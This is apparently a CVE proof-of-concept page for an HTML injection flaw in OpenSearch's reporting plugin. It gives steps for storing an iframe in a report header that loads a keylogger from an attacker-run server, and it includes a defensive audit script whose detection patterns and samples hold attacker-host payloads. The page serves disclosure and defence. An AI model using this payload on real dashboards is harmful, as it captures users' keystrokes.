Associated vulnerability
Title:
N/A
(CVE-2024-54160)
Description: dashboards-reporting (also known as Dashboards Reports), included in OpenSearch before 2.19, has an XSS (cross-site scripting) vulnerability in versions before 2.19.0.0 because Markdown is not sanitized when previewing a header or footer.
Introduction
# [CVE-2024-54160]-Opensearch-HTML-Injection
It was found that the OpenSearch plugin called "reports" was vulnerable to HTML injection in version 2.18.0.
The report functionality allowed users to store HTML in the header and footer while creating a new report definition.
Below is a quick proof of concept where I stored an iframe in the header functionality that fetched a JavaScript keylogger from my local machine, which recorded the keys typed by the user.
# PoC
1. Edit the keylogger.html file and add the local IP address that the python3 http.server is running on.
2. Save keylogger.html.
3. Start the python3 server with "python3 -m http.server" in the same directory as the keylogger.html file.
4. Go to Reports.
5. Fill in the required fields.
6. Select PDF.
7. Enable the header or footer.
8. Enter the iframe payload -> `<iframe src="http://<IP>:8000/keylogger.html">`
9. Click "Preview". The keylogger should be loaded from the python server.
10. Type something on the keyboard and watch the requests arrive at the python server.
# Screenshot of the PoC in action
- The iframed content is rendered to the left (I know it's simple and ugly, but it works for a PoC :) ).
- The logged keystrokes are shown to the right. (The keylogger PoC was not optimal since it missed some keystrokes though!)

# Remedial Action
This is remediated in OpenSearch version 2.19, where the data passed to the footer/header functionality is sanitized with DOMPurify.
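As an added example (not code from the PoC author or from the dashboards-reporting project), the following Node.js script audits stored report-definition header/footer text for markup that the unsanitized 2.18.0 preview would render as active or embedded content, so an administrator can find such definitions before or after upgrading to 2.19, where DOMPurify does the actual sanitizing. The `{ name, header, footer }` definition shape, the field names and the sample values are assumptions constructed for illustration.

```javascript
// Added example, not from the PoC or the dashboards-reporting project.
// Flags report-definition header/footer text that contains markup the
// unsanitized 2.18.0 preview would render as active or embedded content.
// The { name, header, footer } shape is an assumption for illustration.
const ACTIVE_TAGS = ['iframe', 'script', 'object', 'embed', 'form', 'svg', 'math', 'base', 'meta', 'link'];

// Each check is a regex applied to the raw field text plus the reason it reports.
const CHECKS = [
  { reason: 'active element', re: new RegExp(`<\\s*(${ACTIVE_TAGS.join('|')})\\b`, 'i') },
  { reason: 'inline event handler', re: /<[^>]*\son[a-z]+\s*=/i },
  { reason: 'script-scheme URL', re: /(?:href|src|action)\s*=\s*["']?\s*(?:javascript|data|vbscript):/i },
  { reason: 'external resource load', re: /\b(?:src|href)\s*=\s*["']?\s*https?:\/\//i },
];

// Returns the reasons one header/footer string should be reviewed; [] when none.
// This is a triage filter for stored data, not a sanitizer: the fix in 2.19 is to
// pass the rendered HTML through DOMPurify before previewing it.
function findActiveContent(text) {
  if (typeof text !== 'string' || text.length === 0) return [];
  return CHECKS.filter(({ re }) => re.test(text)).map(({ reason }) => reason);
}

// Audits a list of definitions and returns only those needing review, naming the
// field and the reasons, so they can be cleaned up alongside the upgrade.
function auditReportDefinitions(definitions) {
  const findings = [];
  for (const def of definitions) {
    for (const field of ['header', 'footer']) {
      const reasons = findActiveContent(def[field]);
      if (reasons.length > 0) findings.push({ name: def.name, field, reasons });
    }
  }
  return findings;
}

// Constructed sample definitions. The iframe mirrors the shape of the PoC payload
// with a placeholder host; the onerror handler name is likewise a placeholder.
const SAMPLE_DEFINITIONS = [
  { name: 'weekly-sales', header: '## Weekly sales report', footer: 'Generated by OpenSearch' },
  { name: 'suspicious-1', header: '<iframe src="http://ATTACKER_HOST:8000/keylogger.html"></iframe>', footer: '' },
  { name: 'suspicious-2', header: 'Totals', footer: '<img src="missing.png" onerror="track()">' },
];

// Prints the definitions that need review when the script is run directly.
console.log(JSON.stringify(auditReportDefinitions(SAMPLE_DEFINITIONS), null, 2));
```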
Release notes
https://github.com/opensearch-project/opensearch-build/blob/main/release-notes/opensearch-release-notes-2.19.0.md
# PR from Opensearch
https://github.com/opensearch-project/dashboards-reporting/pull/476
File snapshot
[4.0K] /data/pocs/f1b095c37f1bc87b5e9751adbbd5cb8c9aad5859
├── [1.0K] keylogger.html
└── [1.7K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is unavailable or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.